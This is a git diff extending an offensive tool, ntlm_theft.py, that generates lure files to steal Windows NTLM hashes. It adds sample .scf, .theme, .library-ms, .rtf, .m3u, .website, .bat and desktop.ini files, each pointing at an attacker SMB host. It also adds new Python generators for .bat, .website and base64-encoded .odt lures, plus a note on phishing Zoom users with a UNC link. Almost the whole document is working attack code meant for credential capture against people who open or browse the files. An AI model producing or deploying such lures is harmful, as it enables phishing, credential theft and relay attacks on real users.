new file mode 100644
index 0000000..b9f2c8a
--- /dev/null
+++ b/alienkeric/alienkeric.asx
@@ -0,0 +1,7 @@
+
+ Leak
+
+
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric.bat b/alienkeric/alienkeric.bat
new file mode 100644
index 0000000..0d5432f
--- /dev/null
+++ b/alienkeric/alienkeric.bat
@@ -0,0 +1,2 @@
+@echo off
+start "" "\\192.168.10.20\share"
diff --git a/alienkeric/alienkeric.htm b/alienkeric/alienkeric.htm
new file mode 100644
index 0000000..266013e
--- /dev/null
+++ b/alienkeric/alienkeric.htm
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric.jnlp b/alienkeric/alienkeric.jnlp
new file mode 100644
index 0000000..5e21a92
--- /dev/null
+++ b/alienkeric/alienkeric.jnlp
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric.library-ms b/alienkeric/alienkeric.library-ms
new file mode 100644
index 0000000..58b2545
--- /dev/null
+++ b/alienkeric/alienkeric.library-ms
@@ -0,0 +1,29 @@
+
+
+@shell32.dll,-34575
+S-1-5-21-372074477-2495183225-776587326-1000
+1
+true
+\\192.168.10.20\aa
+
+{7d49d726-3c21-4f05-99aa-fdc2c9474656}
+
+
+
+@shell32.dll,-34577
+true
+
+knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}
+MBAAAEAFCAAA...MFNVAAAAAA
+
+
+
+@shell32.dll,-34579
+true
+
+knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634}
+MBAAAEAFCAAA...HJIfK9AAAAAA
+
+
+
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric.lnk b/alienkeric/alienkeric.lnk
new file mode 100644
index 0000000..0426a56
Binary files /dev/null and b/alienkeric/alienkeric.lnk differ
diff --git a/alienkeric/alienkeric.m3u b/alienkeric/alienkeric.m3u
new file mode 100644
index 0000000..ca03449
--- /dev/null
+++ b/alienkeric/alienkeric.m3u
@@ -0,0 +1,3 @@
+#EXTM3U
+#EXTINF:1337, Leak
+\\192.168.10.20\leak.mp3
\ No newline at end of file
diff --git a/alienkeric/alienkeric.odt b/alienkeric/alienkeric.odt
new file mode 100644
index 0000000..b35d373
Binary files /dev/null and b/alienkeric/alienkeric.odt differ
diff --git a/alienkeric/alienkeric.pdf b/alienkeric/alienkeric.pdf
new file mode 100644
index 0000000..808eca5
Binary files /dev/null and b/alienkeric/alienkeric.pdf differ
diff --git a/alienkeric/alienkeric.rtf b/alienkeric/alienkeric.rtf
new file mode 100644
index 0000000..1830afe
--- /dev/null
+++ b/alienkeric/alienkeric.rtf
@@ -0,0 +1 @@
+{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://192.168.10.20/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}
\ No newline at end of file
diff --git a/alienkeric/alienkeric.scf b/alienkeric/alienkeric.scf
new file mode 100644
index 0000000..f33b3cb
--- /dev/null
+++ b/alienkeric/alienkeric.scf
@@ -0,0 +1,5 @@
+[Shell]
+Command=2
+IconFile=\\192.168.10.20\tools\nc.ico
+[Taskbar]
+Command=ToggleDesktop
\ No newline at end of file
diff --git a/alienkeric/alienkeric.theme b/alienkeric/alienkeric.theme
new file mode 100644
index 0000000..b25c65c
--- /dev/null
+++ b/alienkeric/alienkeric.theme
@@ -0,0 +1,66 @@
+[Theme]
+; Windows - IDS_THEME_DISPLAYNAME_AERO_LIGHT
+DisplayName=\192.168.10.20 Theme
+SetLogonBackground=0
+; Computer - SHIDI_SERVER
+[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]
+DefaultValue=\\192.168.10.20\setup.exe,-109
+
+; UsersFiles - SHIDI_USERFILES
+[CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\DefaultIcon]
+DefaultValue=\\192.168.10.20\setup.exe,-123
+
+; Network - SHIDI_MYNETWORK
+[CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\DefaultIcon]
+DefaultValue=\\192.168.10.20\setup.exe,-25
+
+; Recycle Bin - SHIDI_RECYCLERFULL SHIDI_RECYCLER
+[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]
+Full=\\192.168.10.20\setup.exe,-54
+Empty=\\192.168.10.20\setup.exe,-55
+
+[Control Panel\Cursors]
+AppStarting=\\192.168.10.20\setup.exe
+Arrow=\\192.168.10.20\aero_arrow.cur
+Crosshair=
+Hand=\\192.168.10.20\aero_link.cur
+Help=\\192.168.10.20\aero_helpsel.cur
+IBeam=
+No=\\192.168.10.20\aero_unavail.cur
+NWPen=\\192.168.10.20\aero_pen.cur
+SizeAll=\\192.168.10.20\aero_move.cur
+SizeNESW=\\192.168.10.20\aero_nesw.cur
+SizeNS=\\192.168.10.20\aero_ns.cur
+SizeNWSE=\\192.168.10.20\aero_nwse.cur
+SizeWE=\\192.168.10.20\aero_ew.cur
+UpArrow=\\192.168.10.20\aero_up.cur
+Wait=\\192.168.10.20\aero_busy.ani
+DefaultValue=Windows Default
+DefaultValue.MUI=@main.cpl,-1020
+
+[Control Panel\Desktop]
+Wallpaper=\\192.168.10.20\setup.exe
+TileWallpaper=0
+WallpaperStyle=10
+Pattern=
+MultimonBackgrounds=0
+
+[VisualStyles]
+Path=\\192.168.10.20\Themes\Aero\Aero.msstyles
+ColorStyle=NormalColor
+Size=NormalSize
+AutoColorization=0
+ColorizationColor=0XC40078D4
+SystemMode=Light
+AppMode=Light
+
+[boot]
+SCRNSAVE.EXE=
+
+[MasterThemeSelector]
+MTSM=RJSPBS
+
+[Sounds]
+; IDS_SCHEME_DEFAULT
+SchemeName=@\\192.168.10.20\setup.dll,-800
+
\ No newline at end of file
diff --git a/alienkeric/alienkeric.wax b/alienkeric/alienkeric.wax
new file mode 100644
index 0000000..c2e8948
--- /dev/null
+++ b/alienkeric/alienkeric.wax
@@ -0,0 +1,2 @@
+https://192.168.10.20/test
+file://\\192.168.10.20/steal/file
\ No newline at end of file
diff --git a/alienkeric/alienkeric.website b/alienkeric/alienkeric.website
new file mode 100644
index 0000000..55762c1
--- /dev/null
+++ b/alienkeric/alienkeric.website
@@ -0,0 +1,12 @@
+[{000214A0-0000-0000-C000-000000000046}]
+Prop3=19,2
+Prop4=31,go.microsoft.com
+[InternetShortcut]
+URL=file:///192.168.10.20/
+[{A7AF692E-098D-4C08-A225-D433CA835ED0}]
+Prop5=3,0
+Prop9=19,0
+Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056
+Prop6=3,1
+[{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}]
+Prop5=8,Microsoft.Website.B4BD2547.99055A5E
\ No newline at end of file
diff --git a/alienkeric/desktop.ini b/alienkeric/desktop.ini
new file mode 100644
index 0000000..143dd6b
--- /dev/null
+++ b/alienkeric/desktop.ini
@@ -0,0 +1,2 @@
+[.ShellClassInfo]
+IconResource=\\192.168.10.20\aa
\ No newline at end of file
diff --git a/alienkeric/zoom-attack-instructions.txt b/alienkeric/zoom-attack-instructions.txt
new file mode 100644
index 0000000..4833f2e
--- /dev/null
+++ b/alienkeric/zoom-attack-instructions.txt
@@ -0,0 +1,3 @@
+To attack zoom, just put the following link along with your phishing message in the chat window:
+
+\\192.168.10.20\xyz
diff --git a/ntlm_theft.py b/ntlm_theft.py
index b72fb76..4a0fca0 100644
--- a/ntlm_theft.py
+++ b/ntlm_theft.py
@@ -9,7 +9,7 @@
# Open file and allow: pdf
# Browser download and open: .application (Must be downloaded via a web browser and run)
# Partial Open file: .m3u (Works if you open with windows media player, but windows 10 auto opens with groove music)
-
+#
# In progress - desktop.ini (Need to test older windows versions), autorun.ini (Need to test before windows 7), scf (Need to test on older windows)
@@ -25,6 +25,8 @@
# https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt
import argparse
+import base64
+import zipfile
import io
import os
import shutil
@@ -67,7 +69,14 @@
"zoom",
"libraryms",
"autoruninf",
- "desktopini")),
+ "bat",
+ "desktopini",
+ "website", ## done-dev
+ "odt", ##done-dev
+ "zip", ##dev_time&testing(3days)
+ "pptx", ##dev_time&testing(3days)
+ "theme")), ##dev_time&testing(3days)
+
help='Choose to generate all files or a specific filetype')
parser.add_argument('-s', '--server',action='store', dest='server',required=True,
help='The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc)')
@@ -75,6 +84,44 @@
help='The base filename without extension, can be renamed later (test, Board-Meeting2020, Bonus_Payment_Q4)')
args = parser.parse_args()
+##ntlm theft with .odt
+def create_odt(generate, server, filename):
+ # b64 encoded part1
+ contentxml1 = "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjxvZmZpY2U6ZG9jdW1lbnQtY29udGVudCB4bWxuczpvZmZpY2U9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6b2ZmaWNlOjEuMCIgeG1sbnM6c3R5bGU9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6c3R5bGU6MS4wIiB4bWxuczp0ZXh0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnRleHQ6MS4wIiB4bWxuczp0YWJsZT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczp0YWJsZToxLjAiIHhtbG5zOmRyYXc9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6ZHJhd2luZzoxLjAiIHhtbG5zOmZvPSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnhzbC1mby1jb21wYXRpYmxlOjEuMCIgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6bWV0YT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczptZXRhOjEuMCIgeG1sbnM6bnVtYmVyPSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOmRhdGFzdHlsZToxLjAiIHhtbG5zOnN2Zz0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpzdmctY29tcGF0aWJsZToxLjAiIHhtbG5zOmNoYXJ0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOmNoYXJ0OjEuMCIgeG1sbnM6ZHIzZD0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpkcjNkOjEuMCIgeG1sbnM6bWF0aD0iaHR0cDovL3d3dy53My5vcmcvMTk5OC9NYXRoL01hdGhNTCIgeG1sbnM6Zm9ybT0idXJuOm9hc2lzOm5hbWVzOnRjOm9wZW5kb2N1bWVudDp4bWxuczpmb3JtOjEuMCIgeG1sbnM6c2NyaXB0PSJ1cm46b2FzaXM6bmFtZXM6dGM6b3BlbmRvY3VtZW50OnhtbG5zOnNjcmlwdDoxLjAiIHhtbG5zOm9vbz0iaHR0cDovL29wZW5vZmZpY2Uub3JnLzIwMDQvb2ZmaWNlIiB4bWxuczpvb293PSJodHRwOi8vb3Blbm9mZmljZS5vcmcvMjAwNC93cml0ZXIiIHhtbG5zOm9vb2M9Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA0L2NhbGMiIHhtbG5zOmRvbT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS94bWwtZXZlbnRzIiB4bWxuczp4Zm9ybXM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDIveGZvcm1zIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczpycHQ9Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA1L3JlcG9ydCIgeG1sbnM6b2Y9InVybjpvYXNpczpuYW1lczp0YzpvcGVuZG9jdW1lbnQ6eG1sbnM6b2Y6MS4yIiB4bWxuczp4aHRtbD0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCIgeG1sbnM6Z3JkZGw9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvZy9kYXRhLXZpZXcjIiB4bWxuczpvZmZpY2Vvb289Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA5L29mZmljZSIgeG1sbnM6dGFibGVvb289Imh0dHA6Ly9vcGVub2ZmaWNlLm9yZy8yMDA5L3RhYmxlIiB4bWxuczpkcmF3b29vPSJodHRwOi8vb3Blbm9mZmljZS5vcmcvMjAxMC9kcmF3IiB4bWxuczpjYWxjZXh0PSJ1cm46b3JnOmRvY3VtZW50Zm91bmRhdGlvbjpuYW1lczpleHBlcmltZW50YWw6Y2FsYzp4bWxuczpjYWxjZXh0OjEuMCIgeG1sbnM6bG9leHQ9InVybjpvcmc6ZG9jdW1lbnRmb3VuZGF0aW9uOm5hbWVzOmV4cGVyaW1lbnRhbDpvZmZpY2U6eG1sbnM6bG9leHQ6MS4wIiB4bWxuczpmaWVsZD0idXJuOm9wZW5vZmZpY2U6bmFtZXM6ZXhwZXJpbWVudGFsOm9vby1tcy1pbnRlcm9wOnhtbG5zOmZpZWxkOjEuMCIgeG1sbnM6Zm9ybXg9InVybjpvcGVub2ZmaWNlOm5hbWVzOmV4cGVyaW1lbnRhbDpvb3htbC1vZGYtaW50ZXJvcDp4bWxuczpmb3JtOjEuMCIgeG1sbnM6Y3NzM3Q9Imh0dHA6Ly93d3cudzMub3JnL1RSL2NzczMtdGV4dC8iIG9mZmljZTp2ZXJzaW9uPSIxLjIiPjxvZmZpY2U6c2NyaXB0cy8+PG9mZmljZTpmb250LWZhY2UtZGVjbHM+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMdWNpZGEgU2FuczEiIHN2Zzpmb250LWZhbWlseT0iJmFwb3M7THVjaWRhIFNhbnMmYXBvczsiIHN0eWxlOmZvbnQtZmFtaWx5LWdlbmVyaWM9InN3aXNzIi8+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMaWJlcmF0aW9uIFNlcmlmIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO0xpYmVyYXRpb24gU2VyaWYmYXBvczsiIHN0eWxlOmZvbnQtZmFtaWx5LWdlbmVyaWM9InJvbWFuIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iTGliZXJhdGlvbiBTYW5zIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO0xpYmVyYXRpb24gU2FucyZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3dpc3MiIHN0eWxlOmZvbnQtcGl0Y2g9InZhcmlhYmxlIi8+PHN0eWxlOmZvbnQtZmFjZSBzdHlsZTpuYW1lPSJMdWNpZGEgU2FucyIgc3ZnOmZvbnQtZmFtaWx5PSImYXBvcztMdWNpZGEgU2FucyZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iTWljcm9zb2Z0IFlhSGVpIiBzdmc6Zm9udC1mYW1pbHk9IiZhcG9zO01pY3Jvc29mdCBZYUhlaSZhcG9zOyIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjxzdHlsZTpmb250LWZhY2Ugc3R5bGU6bmFtZT0iU2ltU3VuIiBzdmc6Zm9udC1mYW1pbHk9IlNpbVN1biIgc3R5bGU6Zm9udC1mYW1pbHktZ2VuZXJpYz0ic3lzdGVtIiBzdHlsZTpmb250LXBpdGNoPSJ2YXJpYWJsZSIvPjwvb2ZmaWNlOmZvbnQtZmFjZS1kZWNscz48b2ZmaWNlOmF1dG9tYXRpYy1zdHlsZXM+PHN0eWxlOnN0eWxlIHN0eWxlOm5hbWU9ImZyMSIgc3R5bGU6ZmFtaWx5PSJncmFwaGljIiBzdHlsZTpwYXJlbnQtc3R5bGUtbmFtZT0iT0xFIj48c3R5bGU6Z3JhcGhpYy1wcm9wZXJ0aWVzIHN0eWxlOmhvcml6b250YWwtcG9zPSJjZW50ZXIiIHN0eWxlOmhvcml6b250YWwtcmVsPSJwYXJhZ3JhcGgiIGRyYXc6b2xlLWRyYXctYXNwZWN0PSIxIi8+PC9zdHlsZTpzdHlsZT48L29mZmljZTphdXRvbWF0aWMtc3R5bGVzPjxvZmZpY2U6Ym9keT48b2ZmaWNlOnRleHQ+PHRleHQ6c2VxdWVuY2UtZGVjbHM+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJJbGx1c3RyYXRpb24iLz48dGV4dDpzZXF1ZW5jZS1kZWNsIHRleHQ6ZGlzcGxheS1vdXRsaW5lLWxldmVsPSIwIiB0ZXh0Om5hbWU9IlRhYmxlIi8+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJUZXh0Ii8+PHRleHQ6c2VxdWVuY2UtZGVjbCB0ZXh0OmRpc3BsYXktb3V0bGluZS1sZXZlbD0iMCIgdGV4dDpuYW1lPSJEcmF3aW5nIi8+PC90ZXh0OnNlcXVlbmNlLWRlY2xzPjx0ZXh0OnAgdGV4dDpzdHlsZS1uYW1lPSJTdGFuZGFyZCIvPjx0ZXh0OnAgdGV4dDpzdHlsZS1uYW1lPSJTdGFuZGFyZCI+PGRyYXc6ZnJhbWUgZHJhdzpzdHlsZS1uYW1lPSJmcjEiIGRyYXc6bmFtZT0iT2JqZWN0MSIgdGV4dDphbmNob3ItdHlwZT0icGFyYWdyYXBoIiBzdmc6d2lkdGg9IjE0LjEwMWNtIiBzdmc6aGVpZ2h0PSI5Ljk5OWNtIiBkcmF3OnotaW5kZXg9IjAiPjxkcmF3Om9iamVjdCB4bGluazpocmVmPSJmaWxlOi8v"
+ contentxml3 = "L3Rlc3QuanBnIiB4bGluazp0eXBlPSJzaW1wbGUiIHhsaW5rOnNob3c9ImVtYmVkIiB4bGluazphY3R1YXRlPSJvbkxvYWQiLz48ZHJhdzppbWFnZSB4bGluazpocmVmPSIuL09iamVjdFJlcGxhY2VtZW50cy9PYmplY3QgMSIgeGxpbms6dHlwZT0ic2ltcGxlIiB4bGluazpzaG93PSJlbWJlZCIgeGxpbms6YWN0dWF0ZT0ib25Mb2FkIi8+PC9kcmF3OmZyYW1lPjwvdGV4dDpwPjwvb2ZmaWNlOnRleHQ+PC9vZmZpY2U6Ym9keT48L29mZmljZTpkb2N1bWVudC1jb250ZW50Pg=="
+
+ # decode part1 and inject ip
+ part1 = base64.b64decode(contentxml1).decode("utf-8")
+ part2 = base64.b64decode(contentxml3).decode("utf-8")
+ fileout = part1 + server + part2
+
+ # write content.xml
+ with open("content.xml", "w", encoding="utf-8") as f:
+ f.write(fileout)
+
+ #odt need ezodf, create blank one
+ try:
+ from ezodf import newdoc
+ except ImportError:
+ raise ImportError("Missing `ezodf`. Install with:\n pip install ezodf")
+
+ temp_odt = "temp.odt"
+ odt = newdoc(doctype='odt', filename=temp_odt)
+ odt.save()
+
+ #rebuild the file with the malicious injected ip on content.xml
+ with zipfile.ZipFile(temp_odt, 'r') as zin, zipfile.ZipFile(filename, 'w') as zout:
+ for item in zin.infolist():
+ if item.filename != 'content.xml':
+ zout.writestr(item, zin.read(item.filename))
+
+ with zipfile.ZipFile(filename, 'a') as zf:
+ zf.write("content.xml", arcname="content.xml")
+
+ #remove content.xml
+ os.remove("content.xml")
+ os.remove(temp_odt)
+ print(f"Created: {filename} (Open in LibreOffice / OpenOffice)")
# NOT WORKING ON LATEST WINDOWS
# .scf remote IconFile Attack
@@ -100,6 +147,14 @@ def create_url_url(generate,server,filename):
file.close()
print("Created: " + filename + " (BROWSE TO FOLDER)")
+## .bat remote url attack
+def create_bat(generate, server, filename):
+ with open(filename, 'w') as file:
+ file.write(
+ f'@echo off\n'
+ f'start "" "\\\\{server}\\share"\n'
+ )
+ print("Created: " + filename + " (BROWSE TO FOLDER)")
# .url remote IconFile attack
# Filename: shareattack.url, action=browse, attacks=explorer
@@ -497,6 +552,7 @@ def create_desktopini(generate,server,filename):
file.close()
print("Created: " + filename + " (BROWSE TO FOLDER)")
+## .libraryms file creation
def create_libraryms(generate,server,filename):
file = open(filename,'w')
file.write('''
@@ -531,7 +587,6 @@ def create_libraryms(generate,server,filename):
file.close()
print("Created: " + filename + " (BROWSE TO FOLDER)")
-
# .lnk remote IconFile Attack
# Filename: shareattack.lnk, action=browse, attacks=explorer
def create_lnk(generate,server,filename):
@@ -551,6 +606,23 @@ def create_lnk(generate,server,filename):
file.write(bytes(shortcut))
print("Created: " + filename + " (BROWSE TO FOLDER)")
+## .website remote attack
+def create_website(generate, server, filename):
+ with open(filename, "w") as file:
+ file.write(f"""[{{000214A0-0000-0000-C000-000000000046}}]
+Prop3=19,2
+Prop4=31,go.microsoft.com
+[InternetShortcut]
+URL=file:///{server}/
+[{{A7AF692E-098D-4C08-A225-D433CA835ED0}}]
+Prop5=3,0
+Prop9=19,0
+Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056
+Prop6=3,1
+[{{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}}]
+Prop5=8,Microsoft.Website.B4BD2547.99055A5E""")
+ file.close()
+ print(f"Created: {filename} (BROWSE TO FOLDER)")
# create folder to hold templates, if already exists delete it
if os.path.exists(args.filename):
@@ -604,6 +676,13 @@ def create_lnk(generate,server,filename):
create_theme(args.generate, args.server, os.path.join(args.filename, args.filename + ".theme"))
+ create_bat(args.generate, args.server, os.path.join(args.filename, args.filename + ".bat"))
+
+ create_website(args.generate, args.server, os.path.join(args.filename, args.filename + ".website"))
+
+ create_odt(args.generate, args.server, os.path.join(args.filename, args.filename + ".odt"))
+
+
elif(args.generate == "scf"):
create_scf(args.generate, args.server, os.path.join(args.filename, args.filename + ".scf"))
@@ -665,4 +744,13 @@ def create_lnk(generate,server,filename):
elif(args.generate == "theme"):
create_theme(args.generate, args.server, os.path.join(args.filename, args.filename + ".theme"))
+elif(args.generate == "bat"):
+ create_bat(args.generate, args.server, os.path.join(args.filename, args.filename + ".bat"))
+
+elif(args.generate == "website"):
+ create_website(args.generate, args.server, os.path.join(args.filename, args.filename + ".website"))
+
+elif(args.generate == "odt"):
+ create_odt(args.generate, args.server, os.path.join(args.filename, args.filename + ".odt"))
+
print("Generation Complete.")
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
index 0000000..a44e69c
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,3 @@
+xlsxwriter
+ezodf
+lxml